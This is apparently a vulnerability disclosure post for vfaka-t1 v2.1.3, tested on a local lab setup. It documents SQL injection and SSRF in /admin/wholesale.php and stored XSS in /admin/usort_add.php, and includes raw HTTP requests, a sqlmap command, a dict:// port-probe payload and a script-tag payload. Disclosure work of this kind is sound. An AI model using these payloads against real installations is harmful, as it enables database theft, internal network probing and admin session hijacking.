vfaka

本文最后更新于 2026年4月22日 晚上

vfaka

Test Environment:localhost

windows+apache2+phpstorm+php7.3.4

sql injection

Description

There is an SQL injection vulnerability in vfaka-t1 v2.1.3 at the “/admin/wholesale.php” location.

impact

An attacker can exploit this SQL injection to read, modify, or delete sensitive database contents, potentially gaining full control over the admin panel and compromising the entire system.

Vulnerability reproduction

1.Vulnerability analysis

Vulnerability file:/admin/wholesale.php

image-20260304161151462

After receiving the parameter ‘id’, the code did not perform any pre-compilation or filtering operations, and simply concatenated it directly into the SQL statement, resulting in a SQL injection vulnerability.

There are 11 vulnerability points depending on the value of the “type” parameter.

image-20260304163142566

2.Vulnerability exploitation

First, log in to the backend using the administrator account and password.

image-20260304162023928

Construct payload

1
2
3
4
5
6
7
8
9
GET /admin/wholesale.php?action=info&type=text&id=2 HTTP/1.1
Host: 192.168.190.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 Edg/145.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ECS[visit_times]=1; session_id_ip=192.168.190.1_9f2d956ee0b86c82b3585ff7a22c61f2; PHPSESSID=flihml9b49cam75i53lpqke6vm; XDEBUG_SESSION=zhuo; token_1ab794=d01cea091c0b8c8ea2c7ae81c7036978; csrf_1ab794=caa2d977; _CLTJ_1ab7=Lzj2k57McZ; token_3a1257=5e4482557d4681c08c43818018016d00; csrf_3a1257=f370c201
Connection: keep-alive

Use sqlmap to verify the vulnerability.

Successfully verified the existence of time blind injection vulnerability and boolean blind injection vulnerability.

1
sqlmap -r '/home/qfbsz/111/daima/vka/sql.txt' --batch -p id

image-20260304163040580

SSRF Vulnerability

Description

There is an SSRF vulnerability in vfaka-t1 v2.1.3 at /admin/wholesale.php

impact

An attacker can exploit the SSRF vulnerability to make the server send arbitrary requests to internal or external systems, potentially accessing sensitive internal services, bypassing firewall restrictions, or leaking confidential data.

1.Vulnerability Analysis

Vulnerability file:/admin/wholesale.php

image-20260304163352819

This code does not perform any security processing on the URL parameters after receiving them, and directly uses the getbody function to make the request, resulting in an SSRF vulnerability.

2.Vulnerability exploitation

First, log in to the backend using the administrator account and password.

image-20260304162023928

Construct payload

url=dict://127.0.0.1:3306

1
2
3
4
5
6
7
8
9
10
11
12
13
POST /admin/wholesale.php?action=list HTTP/1.1
Host: 192.168.190.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 Edg/145.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ECS[visit_times]=1; session_id_ip=192.168.190.1_9f2d956ee0b86c82b3585ff7a22c61f2; PHPSESSID=flihml9b49cam75i53lpqke6vm; XDEBUG_SESSION=zhuo; token_1ab794=d01cea091c0b8c8ea2c7ae81c7036978; csrf_1ab794=caa2d977; _CLTJ_1ab7=Lzj2k57McZ; token_3a1257=5e4482557d4681c08c43818018016d00; csrf_3a1257=f370c201
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

url=dict://127.0.0.1:3306

image-20260304164234127

Successfully detected the internal network port

Stored Cross-Site Scripting vulnerability

Description

/admin/usort_add.php endpoint of vfaka-t1 v2.1.3 allows attackers to
> execute arbitrary web scripts or HTML via injecting a crafted payload
> into the S_title parameter.

impact

An attacker can inject malicious scripts or HTML into the S_title parameter, leading to persistent cross‑site scripting (XSS) in the admin panel. This could result in session hijacking, unauthorized administrative actions, or theft of sensitive data.

1.Vulnerability Analysis

Vulnerability file:/admin/usort_add.php

image-20260304165741452

During the process of obtaining the “S_title” parameter, the “add” operation and the “edit” operation do not convert it into HTML entities and directly concatenate it into the JavaScript code.

image-20260304165827017

2.Vulnerability exploitation

payload:

1
S_title=<script>alert('xss')</script>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /admin/usort_add.php?action=add HTTP/1.1
Host: 192.168.190.1
Content-Length: 165
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 Edg/145.0.0.0
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.190.1
Referer: http://192.168.190.1/admin/usort_add.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ECS[visit_times]=1; session_id_ip=192.168.190.1_9f2d956ee0b86c82b3585ff7a22c61f2; PHPSESSID=flihml9b49cam75i53lpqke6vm; XDEBUG_SESSION=zhuo; token_1ab794=d01cea091c0b8c8ea2c7ae81c7036978; csrf_1ab794=caa2d977; _CLTJ_1ab7=Lzj2k57McZ; token_3a1257=5e4482557d4681c08c43818018016d00; csrf_3a1257=f370c201
Connection: keep-alive

S_title=<script>alert('xss')</script>&S_sub=0&S_order=0&S_show=1&S_link_type=default&S_link_url=&S_pic=nopic.png&S_keywords=1&S_content=

image-20260304170922739

After a direct refresh, the XSS vulnerability was successfully triggered.

image-20260304170945235

web
#CVE
vfaka
http://example.com/2026/03/04/vfaka/
作者
清风
发布于
2026年3月4日
许可协议